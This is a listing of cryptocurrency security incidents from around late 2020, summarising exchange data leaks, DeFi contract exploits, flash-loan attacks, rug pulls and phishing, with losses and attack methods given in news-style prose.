1909 hack event(s)
Description of the event: On December 1, the Australian cryptocurrency exchange BTC Markets accidentally disclosed the full names and email addresses of all its customers in marketing emails sent to customers, which may expose all customers to potential phishing attacks. These emails are sent in batches of 1,000, which means that every customer has received the names and email addresses of 999 other users. BTC Markets CEO Caroline Bowler said that the company sincerely apologized for the incident and emphasized that the executives of the exchange are currently working around the clock to minimize the impact of violations and implement “additional security features”. To prevent future information leakage. Bowler advises BTC Markets customers to ensure that two-factor authentication is enabled to protect their accounts and to change the password of their email account.
Amount of loss: - Attack method: Information Leakage
Description of the event: DeFi asset mortgage platform Saffron Finance issued an announcement stating that Epoch 1 redemption errors caused by contract loopholes resulted in 50 million DAI deposits deposited by Epoch 1 being locked for 8 weeks. The team is currently working on an emergency fix to solve this problem and will transition to Epoch 2. Saffron Finance is a DeFi asset mortgage platform released by an anonymous team. The token is SFI, allowing liquidity providers to select customized risk exposures to obtain returns. In each cycle, users can choose different risk-return combinations (A, AA, S) on Saffron to provide liquidity. A cycle of 14 days (LP locks within 14 days). After the cycle ends, users can remove liquidity and obtain Interest and prorated SFI.
Amount of loss: $ 50,000,000 Attack method: Contract Vulnerability
Description of the event: The liquidity mining project SushiSwap (SUSHI) community governor 0xMaki announced in the Discord group that the SushiSwap vulnerability has been fixed, and the lost funds (approximately US$10,000) will be compensated from the SUSHI asset library. Previously, SushiSwap was attacked by a liquidity provider. The attacker obtained between 10,000 and 15,000 US dollars in a transaction. However, after this operation was discovered by 0xMaki, 0xMaki sent a transaction to the attacker with a message saying "I found you and we are working hard to fix it. Contact me on Discord to get bug bounty-0xMaki". According to analysis, the attacker uses SLP and WETH to create a new token pool, uses SLP1 of the new token pool to convert in Sushi Maker, and uses a small amount of SLP to transfer all SLPs in the Sushi Maker contract to the tokens they created. In the pool, all the handling fees of the corresponding transaction pair within a period of time will be collected into the bag. Repeat this process for other trading pairs and continue to make profits.
Amount of loss: $ 15,000 Attack method: Price Manipulation
Description of the event: DeFi robo-advisor Rari Capital released an official Twitter saying that contract vulnerabilities have been fixed with the cooperation of Quantstamp and no funds have been lost. Previously, due to loopholes in the RGT Distributor contract, RGT token application and deposit and withdrawal operations have been suspended. Rari Capital is currently reviewing the code update to confirm that there are no other vulnerabilities in the entire code.
Amount of loss: - Attack method: Contract Vulnerability
Description of the event: Compound's price feed error caused the liquidation of $90 million in assets. According to DeBank founder, the huge liquidation of Compound was caused by the dramatic fluctuations in the DAI price of the oracle information source Coinbase Pro. It is a typical oracle attack to manipulate the information source that the oracle relies on to perform short-term price manipulation to achieve misleading prices on the chain.
Amount of loss: - Attack method: Oracle Attack
Description of the event: Ethereum DeFi project Pickle Finance was attacked, losing about 20 million DAI. According to SlowMist analysis, the attacker completes an attack by forging the contract addresses of _fromJar and _toJar when calling the swapExactJarForJar function in the Controller contract, and then transferring the fake currency in exchange for the real DAI in the contract. SlowMist indicates that the swapExactJarForJar function in Pickle Finance's Controller contract allows two arbitrary jar contract addresses to be passed in for token exchange. Among them, _fromJar, _toJar, _fromJarAmount, and _toJarMinAmount are all variables that users can control. Attackers use this feature, fill in both _fromJar and _toJar with their own addresses, and _fromJarAmount is the amount of DAI set by the attacker to extract the contract, about 20 million DAI.
Amount of loss: $ 20,000,000 Attack method: Fake currency for real currency
Description of the event: On November 18th, an attacker exploited the vulnerability to obtain $100,000 in MPH tokens. After that, 88mph discovered a vulnerability in MPHinter, the MPH token minting contract, which could allow a potential attacker to steal all ETH in the Uniswap fund pool. With the help of the well-known white hat samczsun, ETH has been withdrawn into the governance multi-signature, so all funds are safe. In addition, 88mph stated that because the attacker put $100,000 in the LP pool (liquidity fund pool), the funds have been transferred to the governance wallet, and they have decided to allocate these funds to generations including MPH and ETH. Coin holders.
Amount of loss: - Attack method: Contract Vulnerability
Description of the event: Matthew Liu, co-founder of Origin Protocol (OGN), a decentralized sharing economy protocol, wrote an article to disclose the details of the lightning loan attack on the US dollar stable currency Origin Dollar (OUSD). So far, the attack has caused about 7 million U.S. dollars in losses, including more than 1 million U.S. dollars deposited by Origin and its founders and employees. Currently, Origin is determining the cause of the vulnerability and whether it can recover the funds. Origin reminded, "Vault deposits are currently disabled. Please do not purchase OUSD on Uniswap or Sushiswap."
Amount of loss: $ 7,000,000 Attack method: Flash loan attack
Description of the event: The Value DeFi protocol was attacked by a flash loan on Saturday. It is reported that the attacker borrowed 80,000 ETH from the Aave protocol, executed a lightning loan attack, and arbitrage between DAI and USDC. After the attacker used $7.4 million DAI, he refunded $2 million to Value DeFi and retained $5.4 million. In addition, the attacker left a mocking message to the Value DeFi team: "Do you really understand lightning loans?" Value DeFi claimed on Twitter on Friday that it has the function of preventing lightning loan attacks. After inquiry, the tweet no longer exists. Subsequently, the Value DeFi team tweeted to confirm that its MultiStables vault had been subjected to "a complex attack with a net loss of 6 million US dollars.
Amount of loss: $ 6,000,000 Attack method: Flash loan attack
Description of the event: Hackers took advantage of the storage asset verification flaws in the Akropolis project of the Polkadot ecosystem to launch multiple consecutive reentry attacks on the contract, causing the Akropolis contract to issue a large number of pooltokens out of thin air without new asset injection, and then reuse these pooltokens. Withdrawing DAI from the YCurve and sUSD pools resulted in the loss of 2.03 million DAI in the project contract.
Amount of loss: $ 2,030,000 Attack method: Reentrancy Attack
Description of the event: Cheese Bank, a decentralized autonomous digital banking platform based on Ethereum, suffered a loss of USD 3.3 million due to a hacker attack. Hackers conducted a series of malicious lending operations on platforms such as dYdX and Uniswap by using automatic market maker (AMM)-based oracles, resulting in a total loss of over US$3.3 million, including US$2 million in USDC.
Amount of loss: $ 3,300,000 Attack method: Flash loan attack
Description of the event: Mike Kayamori, CEO of cryptocurrency exchange Liquid, posted a notice on the official website that a data leakage security incident occurred on the exchange on November 13. A domain hosting provider that manages a core domain name mistakenly transferred control of the account and domain name to a malicious intruder, allowing it to change DNS records, thereby controlling a large number of internal email accounts, and being able to partially damage the exchange’s Infrastructure and gain access to stored documents. After detecting the intruder, immediate action was taken to intercept and contain the attack to prevent further intrusions and reduce the risk of customer accounts and assets, while conducting a comprehensive review of the infrastructure. It can be confirmed that the customer's funds are safe, and the cold wallet based on MPC (Multi-Party Computing Protocol) is safe and has not been damaged. The relevant regulatory agencies have been notified of the intrusion and will continue to communicate in the next few days. The attacker may have obtained the user's email, name, address, and password. At present, Liquid is investigating whether the attacker has accessed the identity documents and photos submitted to KYC for verification, and will provide updates after the investigation.Liquid announced the final findings on January 20, 2021. Liquid stated that 169,782 items of user data including email addresses, names, encryption passwords, API keys, etc. have been leaked. Among them, the personal information that may be accessed illegally is the user who went through the KYC process before October 2018, such as the user's ID card, self-portrait picture, proof of address and other identity verification documents 28,639.
Amount of loss: - Attack method: Information Leakage
Description of the event: According to FXStreet, the community accused Daniel Wood of the DeFi project based on the Tron blockchain and the anonymous developer of the JustSwap whitelist project SharkTron for running away. Although the specific losses are not yet known, Twitter users reported that they lost 366 million to 400 million TRX (worth about 10 million US dollars). The TRON Foundation officially tweeted that it has contacted Binance to jointly track down the stolen funds and related personnel, and that some funds have been frozen by Binance. The TRON Foundation will also cooperate with other exchanges to track stolen funds. In addition, the TRON Foundation recommends that the victims submit a report to the local police.
Amount of loss: $ 10,000,000 Attack method: Rug Pull
Description of the event: On November 9th, a user named "aaron67" posted about his BSV theft experience, saying that please stop using the multisig accumulator multi-signature solution implemented by ElectrumSV immediately. The locking script of this scheme had serious bugs, so that 600 BSV was stolen on November 6th. After the incident, the user had contacted Roger Taylor, the author of ElectrumSV, for the first time, and the serious bug was subsequently confirmed. At the same time, the Note.SV developers stated that they had done an analysis for the first time to find the source of the bug, and notified the wallet author and community users.
Amount of loss: 600 BSV Attack method: Security Vulnerability
Description of the event: According to reports, the Grin network has recently suffered 51% attacks. An unknown entity controlled more than 57% of network computing power on Saturday. According to the Grin website, the team advises people to wait for "additional confirmation on payment finality." According to a reminder announcement issued on the Grin website on November 9, "Important notice: Grin's network computing power has increased significantly in a short period of time. It is worth noting that this coincides with the time when the Nicehash rate doubled. Currently, more than 50% of the network computing The power is outside the known pool. Considering these circumstances, it is wise to wait for additional confirmation of the transaction to ensure the finality of the payment.” According to previous reports, on November 8, 2Miners tweeted that Grin Network is receiving 51 % Attacked, payment has stopped. Please do so at your own risk, as new blocks may be rejected.
Amount of loss: - Attack method: 51% attack
Description of the event: Phishing and scams targeting Ledger wallet owners are increasing, and one of the scam websites obtained more than 1,150,000 XRP from victims. This scam uses phishing emails to direct users to a fake Ledger website. On this fake website, the victim was tricked into downloading malware that pretended to be a security update, resulting in the theft of all Ledger wallet balances. According to the fraud identification website xrplorer operated by the community, the XRP obtained from the scam was sent to Bittrex through 5 deposits, but the exchange “cannot freeze XRP in time”.
Amount of loss: 1,150,000 XRP Attack method: Phishing attack
Description of the event: DeFi lending platform PercentFinance wrote in a blog on November 4 that some currency markets encountered problems that could cause users' funds to be permanently locked. The team frozen currency markets specifically for USDC, ETH, and WBTC. A total of 446,000 USDC, 28 WBTC and 313 ETH have been frozen, valued at approximately US$1 million. The article stated that half of these fixed funds belonged to PercentFinance's "community improvement team." Withdrawals in other markets have already begun, but the team urges users not to borrow money from any of PercentFinance's markets during this period. It is reported that PercentFinance is a fork of Compound Finance.
Amount of loss: $ 1,000,000 Attack method: Unknown
Description of the event: Cointelegraph reported that on November 2, a project called Axion Network launched the token AXN and was hacked a few hours after it was hacked. 79 billion AXN were minted and sold to the market. The token price was almost zero. The hacker made a profit of 1,300 ETH, or about $500,000.
Amount of loss: $ 500,000 Attack method: Using the unstake function of the Axion Staking contract, we managed to mint approximately 80 billion AXN tokens
Description of the event: Recently, AlonGal, the chief technology officer of the cybercrime intelligence company HudsonRock, tweeted that on October 27, the EtherCrash cold wallet that claimed to be "the most mature and largest gambling game in Ethereum" was stolen, with a loss of about 2.5 million U.S. dollars. for. It is reported that EtherCrash has issued a notice on Discord in which it mentioned that the EtherCrash cold wallet was stolen and there were two large withdrawals. EtherCrash stated that it will compensate users for their property losses, but it will take some time because the losses are more serious.
Amount of loss: $ 2,500,000 Attack method: Wallet Stolen
Description of the event: Data on the chain shows that a large amount of funds in the Harvest Finance fund pool were transferred, and about 24 million US dollars (Specifically, approximately USD 34 million)were successfully cashed out through multiple contract transactions, most of which were cashed out through renBTC. The initial ETH source used by the hacker this time was the Ethereum anonymous transfer platform Tornado.cash. The Hash for this operation is: 0x35f8d2f572fceaac9288e5d462117850ef2694786992a8c3f6d02612277b0877. It can be seen from the Ethereum browser that the hacker transferred 20 WETH to the Harvest Finance contract (address: 0xc6028a9fa486f52efd2b95b949ac630d287ce0af), and finally transferred the 20 ETH back to his address. Harvest Finance updated its Twitter saying that, like other arbitrage economic attacks, this time it originated from a huge flash loan and manipulated the price of one currency Lego (Curve y Pool) many times to deplete another currency Lego (fUSDT, fUSDC) Of funds. The attacker then converted the funds into renBTC and cashed out. Like other lightning loan attacks, the attacker did not give a response time, and attacked end-to-end for 7 minutes. The attacker returned $2,478,549.94 to Deployer in the form of USDT and USDC. On December 7, Harvest Finance officially announced the launch of GRAIN, USDC and USDT claim portals. Officials said that according to the previous hacker's refund of $2.5 million in funds, this reduced user losses to 13.5%. Officials are using USDC, USDT, and GRAIN tokens for mixed compensation to help users who were previously affected by the attack to make claims. Users will receive GRAIN tokens in proportion to their deposits, and the $2.5 million returned by hackers will be distributed proportionally.
Amount of loss: $ 21,500,000 Attack method: Flash loan attack